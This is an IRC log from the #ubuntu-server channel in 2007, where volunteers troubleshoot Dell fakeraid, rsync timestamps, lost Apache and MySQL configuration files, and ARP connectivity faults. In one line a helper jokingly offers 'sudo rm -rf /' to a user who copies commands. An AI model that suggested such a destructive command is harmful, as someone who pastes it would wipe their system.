<porkpie> I have selected the top option
<porkpie> enter rescue mode
<ivoks> cat /boot/grub/device.list
<ivoks> device.map
<ivoks> sorry
<porkpie> I need to enter a shell first ?
<porkpie> OK ...I at the shell command
<ivoks> if you selected first option, then installer chrooted you on that partition
<porkpie> hd0 /dev/sda hd1 /dev/sdb hd2 /dev/sdc
<ivoks> so, you have three disks
<ivoks> ?
<porkpie> when I create the partion I created it on the sdc .....I no what the problem .is now .....I should have selected sda
<ivoks> wait a second...
<ivoks> are you planing to create a raid with those disks or not?
<porkpie> I have 2 disks and 1 raid controller ...I am running hardware raid 1
<porkpie> It's running raid 1
<ivoks> so, if that's hardware raid, linux should see only one disk - sda
<porkpie> yep
<ivoks> if it's fakeraid... then everything is possible
<ivoks> in /dev/discs
<ivoks> how many discs are there?
<porkpie> not such dir
<ivoks> ok, then ls -dl /dev/sd*
<porkpie> it goes up to disk 8
<ivoks> but, is there sda1?
<porkpie> shit the system has hung
<ivoks> heh
<porkpie> need to reboot
<ivoks> tell me the name of that raid controller
<porkpie> PERC 5/i Integrated
<ivoks> that's onboard controller?
<porkpie> I think you are correct
<porkpie> yeah
<ivoks> omg
<ivoks> that's not hardware raid
<porkpie> That what they sell it as 
<ivoks> that's fakeraid
<porkpie> Blast
<ivoks> my advice would be to kill all RAID fetures on that controller
<porkpie> OK
<ivoks> and you linux software raid
<porkpie> then what 
<ivoks> s/you/use
<ivoks> linux software raid is much better than those fakeraids
<porkpie> We brought the box because we want hardware raid
<ivoks> i'm trying to find out what;s PERC
<ivoks> ERC is an acronym for "PowerEdge Raid Controller"
<porkpie> this is the box http://configure.us.dell.com/dellstore/config.aspx?c=us&cs=04&kc=6W300&l=en&oc=pe1950-med&s=bsd
<porkpie> ivoks:this is my colleage Ries ....you said the Dell box is not running hardware raid
<ivoks> well, i never saw integrated hardware raid controller
<ivoks> they were all fakeraids
<porkpie> ivoks:we are running the intergrarted perc raid1
<porkpie> hmm! 
<ivoks> if the OS sees all disks conntected to controller
<ivoks> then it's not hardware RAID
<porkpie> Ries ....linux see's the 3 discs not 1
<Ries> porkpie: you can check that in the bios...
<Ries> porkpie: Maybe raid is not configurated yet?
<ivoks> i think it is
<ivoks> that's why it doesn't boot
<Ries> porkpie: The dell is a nice BIOS where you can check that....
<porkpie> OK ...I will try the server install disc
<ivoks> i would deconfigure it and use linux software raid, which is much better than those fakeraids
<porkpie> There isn't anything in the bios all it say is the intergrated contorller is enabled
<porkpie> I am going to try the server install disk
<ivoks> porkpie: it probably has after-bios configuration
<ivoks> eh, you can't get hw raid for (Included in Price) :/
<Ries> porkpie: I am sure it has HW raid....
<ivoks> Ries: yes, they sell it like that
<porkpie> Ries ....I asked for HW raid
<ivoks> it could be possible to make this one work
<porkpie> Ries:there are no other options ,,,
<porkpie> I am going to try the server install disk 
<ivoks> porkpie: apt-cache show dmraid
<ivoks> porkpie: dmraid is the thing you need
<porkpie> ivoks:I am not in ubuntu 
<ivoks> porkpie: ah... then: dmraid discovers, activates, deactivates and displays properties of software RAID sets (eg, ATARAID) and contained DOS partitions.
<ivoks> porkpie: The following formats are supported: ... LSI Logic MegaRAID ...
<ivoks> altough, there are real hardware RAID controllers, but they are also named LSI Logic MegaRAID
<porkpie> SO it is software raid ...not hardware raid
<ivoks> porkpie: according to Dell, that raid is integrated, and costs 0$
<porkpie> I would be for that level of server
<ivoks> otoh, "additional" controller costs 600$
<porkpie> eh! didn't see that
<ivoks> 600$ is something that looks like hardware raid controller :
<porkpie> ivoks:where does it say that ??
<porkpie> I can't find it
<ivoks> porkpie: http://configure.us.dell.com/dellstore/config.aspx?c=us&cs=04&kc=6W300&l=en&oc=pe1950-med&s=bsd
<ivoks> porkpie: 2nd Controller and HBAs
<ivoks> easiest thing to do would be to buy 3ware raid controller
<porkpie> dam .....I asked for hardware raid and I was told it was hardware raid ......I will call them tomorrow ...
<ivoks> :)
<porkpie> Thanks for all your help
<ivoks> np
<ivoks> good luck guys
<Ries> I had massive performance problems with 3ware controlerers
<JB[away] > why ubuntu are soooooo slow in bug fixing :(
<Ries> JB[away] : depends on teh bug I guess
<JB[away] > what ?
<JB[away] > <Ries> I had massive performance problems with 3ware controlerers <- HTTP performance?
<Ries> JB[away] : with 3ware controllers... I have one production server in TExas which has extreemly high IO wait's, and can only do 10MB/sec
<JB[away] > i have a 3ware SATA Controller too
<JB[away] > on ubuntu
<Ries> do you have a prob with that?
<Ries> I don't know the partical type anymore...
<JB[away] > i have performance problem with a perl application
<JB[away] > i dont know if it is the controller
<JB[away] > how i can test the IO waits ?
<Ries> JB[away] : just check in top
<Ries> run the perl...
<Ries> and if the perl does a lot of disk activity, see what IO Wait does
<JB[away] > i have OTRS perl app
<JB[away] > i dont know if you know
<Ries> What is OTRS?
<JB[away] > www.otrs.org
<JB[away] > ticket system
<JB[away] > i cant test it now
#ubuntu-server 2007-09-24
* Starting logfile irclogs/ubuntu-server.log
<kraut> moin
<soren> lamont: No, but you were the one who did the change?
<kgoetz> win 21
<soren> lose 47
<soren> lamont: http://changelogs.ubuntu.com/changelogs/pool/main/p/postfix/postfix_2.4.5-3/changelog  see the entry for 2.4.5-2 along with http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=437937 :)
<ubotu> Debian bug 437937 in postfix "postfix: Shouldn't recommend mail-reader" [Normal,Fixed] 
<kgoetz> win 21
<kgoetz> ffs. not again
<sahafeez> dumb question - running rysnc...i get rsync: failed to set times on "/data/Music/.": Operation not permitted (1) -
<sahafeez> i set that dir to chmod a+rwx
<sahafeez> there is no way i can make the owner match.
<soren> sahafeez: You can't do that then.
<sahafeez> that is very lame.
<soren> sahafeez: Only root can change the time stamps of other people's files.
<soren> sahafeez: I find it quite reassuring that random users cannot change my timestamps, actually?
<sahafeez> okay, riddle me this. the owner of that file is replaced by the uploaders (rsync) usersname on sync. it was root.users and changed to the username used for ssh
<sahafeez> so root.user becomes sahafeez.sahafeez
<soren> That's a bit confusing...
<sahafeez> yes..
<soren> Two machines... Which user on which machines is running rsync over which protocol as which remote user?
<sahafeez> i will have to look at it a bit i think..
<sahafeez> same username - differnet uid
<soren> Over ssh?
<sahafeez> yah
<sahafeez> i think i am looking at something wrong..
<sahafeez> one sec.
<soren> And you have a file that used to be owned by root which is now owned by someone else?
<sahafeez> hum, yes i thought so, but no. i missed the part of the file being deleted and replaced
<sahafeez> thus the username chagne
<soren> That would do it, yes.
<sahafeez> so if i change the owner to the ssh users will they beable to update the time
<soren> Some of them, yes.
<sahafeez> the ones i care about in this case
<sahafeez> thanks. that makes things clear.
<soren> Rock :)
<sahafeez> i asumed like an ass if i gave full rights to all that they time stamp went with it..
<sahafeez> ugh - what perms do i want for group rw and cd
<sahafeez> i just did chmod -R a+rw-x but then i cannot change the dir as a user :)
<soren> sahafeez: To cd into a directory you need execute permissions.
<soren> sahafeez: Actually, to reference anything in the directory, you need execute privileges.
<sahafeez> yah, remember that after i could not do it :() I should not be doing this at 130am..
<sahafeez> thanks for your help. i got it sorted. you pointed me the correct way..
<soren> sahafeez: :) np
<sahafeez> gnight!
<soren> 'night.
<BurnAlting> I have been scanning the net for the past few hours attempting to get a definite answer as to what hardware raid HBA's work under 7.04 - I can only see SUGGESTIONS that the Adaptec ServeRAID or LSI Megaraid MAY WORK ... it's as if one has to 'suck it and see'
<ivoks> BurnAlting: ubuntu supports much more
<BurnAlting> ivoks: Where do I find a reference to them
<ivoks> i don't think there's a list of supported hardware :/
<ivoks> if you tell me what you have, i could tell you if it is supported
<ivoks> range of supported hardware is too big to fit on one web page, but, yeah, we should do something like that...
<ivoks> at least for most common hardware
<BurnAlting> ivoks: I have nothing ... I want to buy a card to work in a IBM 3650 box ... perhaps the ServeRAID card (Adaptec 9580W) works already but I just can't find a positive statement saying it does.
<ivoks> supported by aacraid driver
<ivoks> (in 7.04)
<BurnAlting> ivoks: Thanks
<ivoks> np
<lamont> soren: heh.  yeah, I did that
<soren> lamont: <g>
<lamont> <lamont> I frequently don't want to know about packages I uploaded 5 minutes ago.
<soren> So sad.. :)
<lamont> I forget how long ago I said that, I think it was in ubuntu-devel :-)
<heno> dendrobates: did you register on the QA tracker as 'rsclark3' or is that someone else?
<dendrobates> heno: someone else.
<heno> dendrobates: heh, ok. He's signed up for server test cases as well, so I was a bit in doubt :)  https://iso.qa.stgraber.org/qatracker/subscriptions
<dendrobates> heno: I am registered as dendrobates.  I do not have access to that subscription page, though.
<heno> dendrobates: oh, is that restricted access? try now. I've given you some admin powers
<dendrobates> heno: works now, thanks.
<wolfeySI> hello any idea why after installing apache, apache wouldnt know its AddType command?
<mralphabet> wolfeySI: how did you install apache?
<wolfeySI> apt-get install apache2 and some other modules
<wolfeySI> then i tried to copy my old configuration over
<mralphabet> how old?
<wolfeySI> up to a year old
<wolfeySI> anyway for start, can i get default config back?
<wolfeySI> mhm
<wolfeySI> anyway i'm surprised i get this error
<wolfeySI> like some default module is not installed at all
<mralphabet> what is the error?
<wolfeySI> Syntax error on line 22 of /etc/apache2/mods-enabled/ssl.conf:
<wolfeySI> Invalid command 'AddType', perhaps misspelled or defined by a module not included in the server configuration
<wolfeySI> i tried googling for it
<wolfeySI> found i'm not only one, but no solutions
<mralphabet> and what is the line?
<soren> wolfeySI: Is mod_mime enabled?
<wolfeySI> AddType application/x-x509-ca-cert .crt
<wolfeySI> soren: now no idea
<soren> wolfeySI: "sudo a2enmod mime"
<soren> wolfeySI: That's where the AddType directive comes from.
<wolfeySI> This module does not exist!
<soren> Which version of Ubuntu is this?
<wolfeySI> latest
<soren> feisty or gutsy beta?
<mralphabet> wolfeySI: todays?
<wolfeySI> feisty
<wolfeySI> latest stable
<wolfeySI> so i guess i need to install this module
<mralphabet> do you have mime.load in /etc/apache2/mods-enabled/mime.load ?
<wolfeySI> no such file
<wolfeySI> even in mods-available only thing is mime-magic
<wolfeySI> so any idea what to install?
<soren> wolfeySI: Do you have apache2.2-common installed?
<wolfeySI> yes
<wolfeySI> says latest installed
<soren> Hang on...
<soren> Did you manually move anything around in /etc/apache2 to restore your old config?
<mralphabet> 11:04 < wolfeySI> then i tried to copy my old configuration over
<soren> There's your problem, I'd say.
<soren> You messed that up somehow.
<nealmcb> what did you copy it over from?
<wolfeySI> whole /etc/apache2 from 9 months installation on old server
<wolfeySI> 9 months old
<wolfeySI> so what's the big deal?
<nealmcb> old ubuntu server?
<wolfeySI> yes
<nealmcb> what release?
<wolfeySI> dapper i think
<wolfeySI> whatever was stable last november
<nealmcb> I wouldn't think you'd want the whole directory - just the parts you modified....
<wolfeySI> but nevermind i'm losing patience here..
<wolfeySI> i installed it more or less the same
<wolfeySI> and now basic command doesnt work
<wolfeySI> which works everywhere else
<wolfeySI> this ubuntu way of splitting one thing into zillion modules is really helping
<wolfeySI> now for support channel you seem awfully out of ideas
<wolfeySI> am i wrong?
<nealmcb> some parts of the configuration files are updated with new releases
<nealmcb> so you can't just overwrite them with old stuff
<wolfeySI> can you at least tell me how to get config files that are part of release back
<wolfeySI> nealmcb: wrong i always do that
<wolfeySI> :)
<wolfeySI> dpkg-reconfigure apache2 does nothing
<wolfeySI> any other magic command
<nealmcb> do you have a diff of the original dapper release and your changes?  apply that sort of diff to the new config
<wolfeySI> still i dont quite understand this
<wolfeySI> all what is troubling me know is why 'AddType' command is not known
<nealmcb> for most people it is just a few site files and some changes to the main file, not all the mods-available etc
<wolfeySI> is command itself specified by 'config'
<nealmcb> ?
<wolfeySI> or there's some essential module that wasnt installed
<soren> wolfeySI: I have to say, I don't particularly like your tone.. Nevertheless, to restore the original config, you "apt-get --purge remove apache2.2-common" and then apt-get install it again.
<nealmcb> I think that by changing stuff in mods-available etc to an old version you've fouled up some aspect of the distribution
<soren> wolfeySI: Yes, AddType is unknown because you don't load mod_mime anymore because you nuked the config for it.
<wolfeySI> ahh ok
<nealmcb> wolfeySI: and remember, we're all volunteers :-)
<nealmcb> well, most of us....
<soren> :)
<wolfeySI> i understand yes... i have little problem with ubuntu myself, but i'm required to work with it
<wolfeySI> i'm more gentoo fan myself, but cant choose here
<soren> Where?
* soren is curious :)
<wolfeySI> at small company
<nealmcb> slovenia?
<wolfeySI> yes
<nealmcb> I sing songs from a bunch of balkan countries :-)
<wolfeySI> well balkan is fun region
<wolfeySI> kind of 'wild wild east'
<wolfeySI> :)
<nealmcb> yeah - lots of material for songs :-)
<soren> Just a friendly word of advice. Pointing out that you're "losing patience" and telling people that they're "awfully out of ideas" is not a good strategy to get help.
<wolfeySI> soren: i waited good 20 minutes before writing that
<wolfeySI> then suddenly i get some answers
<wolfeySI> i think it was worth writing it
<wolfeySI> :)
<nealmcb> Seriously good guide to asking questions on IRC: http://www.sabi.co.uk/Notes/linuxHelpAsk.html
<soren> We were already helping you when you wrote it.
<wolfeySI> i had it before a bit messed up
<wolfeySI> but since i have you... virtual hosts should go where?
<wolfeySI> sites-available or what?
<wolfeySI> or vhosts?
<soren> sites-available.
<soren> And then you symlink to them from sites-enabled.
<wolfeySI> ok
<nealmcb> !apache > wolfeySI
<nealmcb> !apache | wolfeySI
<ubotu> wolfeySI: LAMP is an acronym for Linux-Apache-MySQL-PHP. However, the term is often used for setups using alternative but different software, such as Perl or Python instead of PHP, and Postgres instead of MySQL. For help with setting up LAMP on Ubuntu, see  https://help.ubuntu.com/community/ApacheMySQLPHP - See also the Server CD installation process (different in Edgy+)
* nealmcb . o O (probably better to use "|" with ubotu....)
<nealmcb> is there an easy and generic way to query the history of different files over ubuntu releases?  Sort of a cross-release takeoff on `apt-file search mime.load `
<mralphabet> nealmcb: yeah, I was trying to find which package included mime.load and my apt-/dpkg-foo failed me
<nealmcb> A nice little web-app to query that would be delightful :-)
<nealmcb> it isn't in dapper, is in feisty, don't know about gutsy
<nealmcb> (mime.load)
<soren> packages.ubuntu.com does most of that, I believe.
<mralphabet> down to the individual file? /peruses
<mralphabet> "Search the contents of packages"
<mralphabet> well there you go
<soren> \o/
* soren goes to dinner
<jalsot> hi
<jalsot> does anybody have a running Xen 3.1.0 on dapper?
<jalsot> getting "ImportError: libxenctrl.so.3.0: cannot handle TLS data" when starting xend
<jalsot> as I found with google, I would need a patched libc for dapper
<jalsot> anybody can help with?
<lamont> ScottK: looks like bug #81242 is actually an openldap bug?  (as far as where the fix goes..)
<ubotu> Launchpad bug 81242 in postfix "postfix-ldap is linked against gnuTLS" [Medium,Triaged]  https://launchpad.net/bugs/81242
<lamont> no?
<ScottK> lamont: I don't know.
<lamont> ok
<lamont> anyway, nothing for me to change in postfix there...
<lamont> since libldap2 is the one doing the binding, not me.
<ScottK> Well I suppose you could link postfix against gnuTLS, but I doubt that's a really good idea.
<ScottK> jdstrand: Are you there?
<jdstrand> ScottK: yep
<ScottK> I'm looking at the devscripts bug you just filed
<jdstrand> ScottK: that was fast :)
<ScottK> It's already in suggests.
<ScottK> If devscripts installed everything that was needed to make every devscript work, it would install not small stuff like emacs.
<ScottK> So as a rule, devscripts doesn't do that.
<jdstrand> ScottK: dch would not continue without it.
* lamont applauds devscripts
<jdstrand> ScottK: alright, if that's the policy.  I found it a little surprising, so I filed the bug.
<lamont> jdstrand: and ubuntu-desktop Depends: (albeit indirectly, I think) on liburi-perl
<ScottK> It is suprising.  I agree.
<lamont> jdstrand: how dare you do source development on a server.
<lamont> :)
<ScottK> Devscripts is considered special because of:
<jdstrand> lamont: it was even less than a server.  ubuntu-minimal for chroot builds
<ScottK> 1.  Installing everything you need for all the scripts would take you to a rediculous place.
<lamont> ah.  yeah.  I remember bumping into that
<ScottK> 2.  If you are using devscripts, you are expected to know what you are doing, so this shouldn't be a problem.
* lamont -> gone
<jdstrand> ScottK: I hear what you are saying.  It took my (quite a bit) longer to issue the bug report than to fix it.  Just trying to help the next guy as I hadn't run into the issues you've described.
<ScottK> OK.  Well I'm going to invalid the bug.  Just wanted to touch base with you first.
<jdstrand> ScottK: thanks
<kana1976> test
<emretemp> test
<umop-apisdn> i saw it, if that helps ;)
<emretemp> thx ; )
#ubuntu-server 2007-09-25
<slackern> Just curious if anyone know what transfer speeds would be achievable on a Pentium 3 500Mhz with 448mb ram and with 2 3com cards using the 3c905 modules when it's acting as a router and firewall? Would it be able to handle maybe an 80% throughput on a 100mbit connection?
<PanzerMKZ> that should be possible
<slackern> I guess i'll see how well it works, to much work rearranging everything here at home to try the throughput and i can only get around 50mbits downstream from my isp at home at it handled that atleast
<PanzerMKZ> darn
<PanzerMKZ> that is nice
<PanzerMKZ> over here the speeds are no where near that
<slackern> Yeah it's quite nice buts it's capped for upstream to around 180k/sec and 55 mbit i only get during late nights, daytime it's around 25-35 but thats good enough, it's darn cheap here through the local cable supplier
<PanzerMKZ> ouch
<PanzerMKZ> on the upstream
<PanzerMKZ> over here we get 256k or above
<slackern> oh i ment 180kilobyte/sec not kilobit
<PanzerMKZ> ok
<PanzerMKZ> that is a world of difference
<slackern> but still it's not too exciting :)
<PanzerMKZ> only 50KB max here
<PanzerMKZ> no it ain't but it is nicer then us
<kgoetz> wow you must suffer... i hae 64k symetric mostof the time here
<PanzerMKZ> but that is at work
<PanzerMKZ> at home I am on dial up
<slackern> hehe, haven't even seen a modem last 10 years i think :)
<PanzerMKZ> isa modem
<kgoetz> :\
<slackern> last time i used on myself was on the amiga :)
<slackern> on/one
<PanzerMKZ> why though so old a p3?
<PanzerMKZ> just a 500
<PanzerMKZ> I mean yea my router/modem here at home is a 450 but for somethign that fast why not a little faster box?
<slackern> No money for anything better, and that machine was for free
<kgoetz> mines a 270 (ultrasparc)
<PanzerMKZ> ok
<kgoetz> afk, lunch
<slackern> Not sure if it will route anything at all yet since the 100/100 connection has 2 IP's so it might just be standing there as a little simple server for hosting a few webpages and a shell
<PanzerMKZ> wow
<PanzerMKZ> then that should work ok
<PanzerMKZ> of course I got a freebie dual p3
<PanzerMKZ> nice having later p3's
<slackern> http://81.94.95.51:8080/phpsysinfo is the almighty machine :)
<slackern> aye can make those boxes run really quiet too, don't need much cooling
<PanzerMKZ> yea
<PanzerMKZ> if I don't quit my job tomorrow then I plan on building a dual 1gig p3
<slackern> hehe talking of dual p3's i need to show some old pics from an old ftp server me and a couple of friends built :)
<PanzerMKZ> ok
<slackern> just need to find them, just a minute
<PanzerMKZ> I got a dual p3 733 at work
<PanzerMKZ> 2.8gig of ram
<kraut> p III is nice :)
<kraut> http://exodus.packetloss.biz/
<PanzerMKZ> how do yall do the stats page?
<kraut> apt-get install phpsysinfo
<PanzerMKZ> ok
<slackern> http://81.94.95.51:8080/pics
<slackern> finally found them
<kraut> oO
<slackern> there are actually 2 different setups with a single cpu mb and a dual p3 933 :)
<PanzerMKZ> ok
<PanzerMKZ> on that 500 there is a linksys card in there
<PanzerMKZ> says lite on
<PanzerMKZ> though
<slackern> Was a nightmare getting all controller cards working together, put one in and another stopped working, switch places on them and they worked and the 3rd stopped working
<PanzerMKZ> nasty
<slackern> aye it's a netgear nic, but it's unused, it got some errors on it for some reason after i was playing with iptables
<PanzerMKZ> that is weird part number LNE100TX is normally linksys
<PanzerMKZ> but ok
<slackern> it uses the tulip driver
<PanzerMKZ> ok
<PanzerMKZ> learn something new
<PanzerMKZ> not bad that is a nasty amount of drives
<slackern> there was 3 15k scsi drives in there to on that big controllercard to be able to manage uploading to it on 100mbit
<PanzerMKZ> nuts
<slackern> 20 drives in total :p
<PanzerMKZ> well won ebay auction for a printer cartridge
<PanzerMKZ> 80$
<PanzerMKZ> for a 240$ cartridge
<PanzerMKZ> 15K prints
<slackern> hehe thats alot of prints
<PanzerMKZ> yea
<PanzerMKZ> upgraded the mem from 32meg to 128
<slackern> haven't had a printer in years, last one was some horrible inkjet thingy that gulped more ink than a truck spends petrol
<PanzerMKZ> oh this is big old network laser
<slackern> Was offered on of those HP Laserjet printers that are everywhere but didnt have room for it back then, so darn nice with a laser printer sometimes
<PanzerMKZ> a bunch of scsi drives?
<PanzerMKZ> yea they are
<slackern> bunch of scsi drives?
<PanzerMKZ> that looks like a bunch of scsi
<PanzerMKZ> or do I yet again need to go clean my eyes
<PanzerMKZ> ?
<slackern> there are 3 or 4 scsi drives on the pictures, you can also see the controller card for them there with the extra ram on it
<PanzerMKZ> it takes me awhile per pic
<slackern> oh
<PanzerMKZ> as I don't have that much bandwidth
<PanzerMKZ> oh a slot1 with slotkets
<PanzerMKZ> cool
<slackern> There was 2x450 slot1's in it from the start but we managed to get our hands on those 2 socket370's 933Mhz ones instead, they weren't supported if i remember right but it worked fine anyhow
<PanzerMKZ> well if it would do 133mhz on the fsb then yea that would be sweet
<PanzerMKZ> my 933 running on a 100fsb downclocked to 700
<PanzerMKZ> but worked great
<slackern> ahh thats right, they wanted 133 fsb and it wasn't supported but it still ran on it, was so long time ago i barely remember
<PanzerMKZ> cool though
<PanzerMKZ> I bet the jump from 450's to 933's was felt greatly
<PanzerMKZ> I have a single 933 and a single 450 here side by side
<PanzerMKZ> and the difference is more then the double the clock speeds
<slackern> oh lord, time flies when you get ambushed by the internet, it's 05:24 i just noticed :p
<PanzerMKZ> yea
<slackern> clocks everywhere on the computer but still manage to see it :)
<slackern> uhm miss it :p
<PanzerMKZ> nasty
<slackern> oh well time to get some sleep or i'll be a zombie later on, good night.
<PanzerMKZ> night
<sensei> I hope you can help, it might be me being lame, or it might be pure magic.. We've got two ubuntu servers which every odd 10 minutes loses connectivity. Can't SSH in, can't ping, nothing.. If I go to the servers, ping an external address, then it works and I can SSH in again for another ten or so minutes.. There's no networkmanager, avahi or anything that could automagically reconfigure anything running. I suspected the e100 driver after reading some 
<sensei> There's an ARP entry in the router for both machines as they boot up, then if I clear the ARP, they don't get a new one
<sensei> But if I go in and ping something, it gets one
<sensei> and I can connect back in
<soren> Do they have a firewall installed?
<sensei> Nops, not yet
<sensei> There are other devices in the switch that works, and I tried plugging them into those sockets to rule out the switch
<soren> Your post comment was cut short.. The last bit I got was: "e100 driver after reading some"
<soren> Your
<soren> gah..
<soren> Your *first* comment was...
<sensei> some negative comments on it on mailing lists, so I put a realtek basedcard in there, but got the same result
<soren> Ah, ok.
<soren> That's interesting.
<sensei> dmesg doesn't show any "lost link" or something like that either, LEDs on the NIC glows and blinks, but there's just nothing going through them
<sensei> Indeed :) If it wasn't for the deadline, I'd be thrilled
<soren> No, it smells like it just doesn't respond to arp requests at all.
<sensei> Indeed
<soren> Is this a reasonably fresh install?
<soren> Or have you done a lot of tweaking of it?
<sensei> As of 6pm yesterday
<soren> That's pretty fresh :)
<sensei> No tweaking yet, this happened straight after install as well, so I apt-got all the updates available, but it keeps doing it
<sensei> Indeed :)
<soren> You could try looking at a tcpdump to see if it ever actually receives any arp requests.
<soren> Oh, hang on.
<sensei> That's a good idea. I was also thinking about putting a laptop up on the same IP, to see if that one dies as well
<soren> Is it at all possible that there might be another machine on the network with the same ip?
<soren> Namely one that doesn't respond to ping or ssh or anything?
<sensei> soren: Not really, no.
<sensei> And that'd give us an ARP entry, just the wrong one, wouldn't it? :)
<soren> True.
<sensei> This is indeed a tricky one :/
<sensei> Running tcpdump now, waiting for it to fail
<sensei> soren: There is definitely ARP traffic going, both who-has and replies
<sensei> Considerably more who-has than replies, but to be honest, I'm not overly sure what's normal when it comes to ARP
<sensei> Ah, 'reply' is when something is asking the machine and who-has is an outgoing query, so that'd be normal then
<soren> Well, yes.
<soren> But you'd also see the requests *to* the machine and the responses from it.
<sensei> What would that look like ?
<sensei> Noooooooooooooooooo
<sensei> Customer has come back and said that if there will be further delays, they want to go ahead with RH
<sensei> I feel defeated :(
<sensei> I hate this, it's like watching a whole series without seeing the last episode
<soren> sensei: Does it actually work with rh?
<sensei> soren: Don't know yet, I can let you know once we've reinstalled if you're interested :)
<soren> sensei: I am. :)
<kimmey2k3> I run Feisty server and its complaining about /usr/share/gdm/themes/Human/Human.xml when I start up. I tried to remove it completely first, that didnt work. Then i reinstalled with apt-get install human-theme and that didnt work neither. Also its no Human-folder in /usr/share/gdm/themes/ - Any that kowns a simple method to fix it?
<soren> kimmey2k3: Try in #ubuntu. This has nothing to do with server stuff.
<kimmey2k3> Ok :)
<pschulz01> Where do I find the PDF of the Ubuntu server guide?
<soren> pschulz01: First hit: http://www.google.dk/search?ie=UTF-8&oe=UTF-8&q=ubuntu+server+guide+pdf  :)
<pschulz01> soren: Thanks.. I was just about to fire up svn.
<soren> pschulz01: :)
<soren> np
<kraut> moin
<sommer> morning
<nealmcb> 83 minutes:  https://wiki.ubuntu.com/ServerTeam/Meeting
<paradizelost> hey all, i'm trying to install 6.06 server on a proliant ml350g5, and i press "english" "US English" and it just sits there
<paradizelost> hello?
<Kamping_Kaiser> be patient
<Kamping_Kaiser> in answer to your question: if you press alt+f4, what sort of output do you see?
<paradizelost> it keeps scrolling about a usb being connected and then disconnected over and over and over
<Kamping_Kaiser> do you have any usb devices plugged in?
<paradizelost> nope
<paradizelost> and don't intend to
<paradizelost> i started up this time with noapic, should i turn acpi off?
<Kamping_Kaiser> i'm wondering if you shoudl disable usb
<Kamping_Kaiser> iirc theres an option for it
<paradizelost> nouhci probably
<paradizelost> looks like possibly an issue with the iLO virtual devices
<paradizelost> hmm no luck
<paradizelost> disabled USB in the bios
<paradizelost> did noapic, nolapic, pci=noacpi,
<nealmcb> 10 minutes in #ubuntu-meeting: https://wiki.ubuntu.com/ServerTeam/Meeting
<heno> See https://iso.qa.stgraber.org/qatracker/subscriptions for server ISO testing registrations
<heno> lots of people signed up for i386, less for amd64 and sparc
<paradizelost> !vmware
<ubotu> VMWare Player is in Ubuntu's !Multiverse repository (package "vmware-player"), and http://www.easyvmx.com/easyvmx.shtml can create VMs for it. For VMWare Server, instructions can be found at https://help.ubuntu.com/community/VMware - See also !virtualizers
<wolfeySI> hello i again corrupted something with old configs, how to get default config for mysql-server back ?
<wolfeySI> please:)
<ivoks> purge old mysql :)
<ivoks> and install it again
<wolfeySI> that doesnt seem to work
<wolfeySI> do i need to delete /var/lib/mysql too? :(
<ivoks> what doesn't work?
<wolfeySI> it doesnt give me default /etc/mysql back
<ivoks> apt-get --purge remove mysql-server?
<wolfeySI> yes
<wolfeySI> i do that and install back
<wolfeySI> still no /etc/mysql
<ivoks> did you remove mysql-server-5.0?
<wolfeySI> YES
<wolfeySI> ahh no
<ivoks> my.cnf is part of mysql-common
<ivoks> so, you should remove libmysqlclient15off mysql-client-5.0 mysql-common mysql-server mysql-server-5.0
<wolfeySI> it told me i need to apt-get autoremove
<wolfeySI> to remove the rest you listed here
<ivoks> do apt-get --purge auto-remove
<ivoks> do apt-get --purge autoremove
<wolfeySI> fuck
<wolfeySI> this is all messed up
<wolfeySI> why is ubuntu so hard at this things
<wolfeySI> http://wolfey.si/test/mysql.txt
<wolfeySI> i get zillion of errors at this
<ivoks> you removed configs by hand
<wolfeySI> i wish this ubuntu would stop trying to be smart
<wolfeySI> ivoks: SO WHAT THE HELL CAN I DO NOW
<mralphabet> Hi, I took the engine out of my 1972 Chevy Impala and put it in my 2002 Toyota Camry and the exhaust ports aren't lining up.  Why doesn't Toyota just play nice?
<wolfeySI> ivoks: FORMAT PARTITION AND INSTALL UBUNTU AGAIN? ;)
<mralphabet> wolfeySI: do we need to go over how to ask questions nicely in IRC again?
<wolfeySI> i'm asking nicely
<wolfeySI> i'm just a bit nervous nothing works on server
<ivoks> if that's nice, then my answer is 'buy a support'
<wolfeySI> is this so hard to ask: what to do to erase all mysql, let it forget it ever was installed and install back?
<ivoks> you should remove packages, not config files
<ScottK> wolfeySI: People here really do try to help even if it may not feel like it at the moment.
<wolfeySI> ScottK: i purged mysql.. however after install it says it cant configure itself
<ivoks> since you removed config files by hand, you have to reinstall packages which contain them
<mralphabet> there is a force install for apt
<ivoks> i would do apt-get --reinstall install mysql-common
<ScottK> wolfeySI: Listen to ivoks.
<wolfeySI>  apt-get --reinstall install mysql-common
<wolfeySI> sorry
<ivoks> nice, copy paste... :)
<ivoks> sudo rm -rf /
<ivoks> :D
<wolfeySI> lol
<wolfeySI> ivoks: i'm already root
<ivoks> did you reinstall mysql-common?
<wolfeySI> doesnt help
<wolfeySI>  apt-get --reinstall install mysql-common
<wolfeySI>  * Stopping MySQL database server mysqld                                                                               [ OK ] 
<wolfeySI>  * /etc/init.d/mysql: WARNING: /etc/mysql/my.cnf cannot be read. See README.Debian.gz
<ivoks> so you've deleted that also by hand
<ivoks> ok...
<ivoks> go to /var/cache/apt/archives/
<ivoks> dpkg --force-confmiss mysql-common mysql-server-5.0
<ivoks> uff.. -i
<ivoks> dpkg --force-confmiss -i mysql-common mysql-server-5.0
<wolfeySI> wait i seriously purged all mysql dependant things now
<ivoks> and put *.deb behind name of the package
<wolfeySI> ahh still same
<ivoks> hopefully, you have only one deb for each :)
<wolfeySI> nope
<wolfeySI> root@x235:/var/cache/apt/archives# dpkg --force-confmiss -i mysql-common.deb mysql-server-5.0.deb
<wolfeySI> dpkg: error processing mysql-common.deb (--install): cannot access archive: No such file or directory
<wolfeySI> dpkg: error processing mysql-server-5.0.deb (--install): cannot access archive: No such file or directory
<ivoks> 18:03 < ivoks> and put *.deb behind name of the package
<ivoks> not .deb
<ivoks> *.deb
<wolfeySI> geez
<wolfeySI> okey thx ivoks
<ivoks> np
<wolfeySI>  * Stopping MySQL database server mysqld                                                                               [ OK ] 
<wolfeySI>  * Starting MySQL database server mysqld                                                                               [fail] 
<ivoks> did you change anything in my.cnf?
<ivoks> you know you shouldn't change it?
<ivoks> there is conf.d directory in /etc/mysql/
<ivoks> all your configs should go there
<soren> The files in there must have a .cnf extension!
<soren> Very important, hard learned lesson there :)
<ivoks> right
<wolfeySI> ivoks: i didnt change anything this time
<ivoks> wolfeySI: check /var/log/daemon.log
<ivoks> there should be some info about problems
<sensei> soren: An RH box on the same IP in the same port on the switch worked just fine
<sensei> (and a laptop running windows XP)
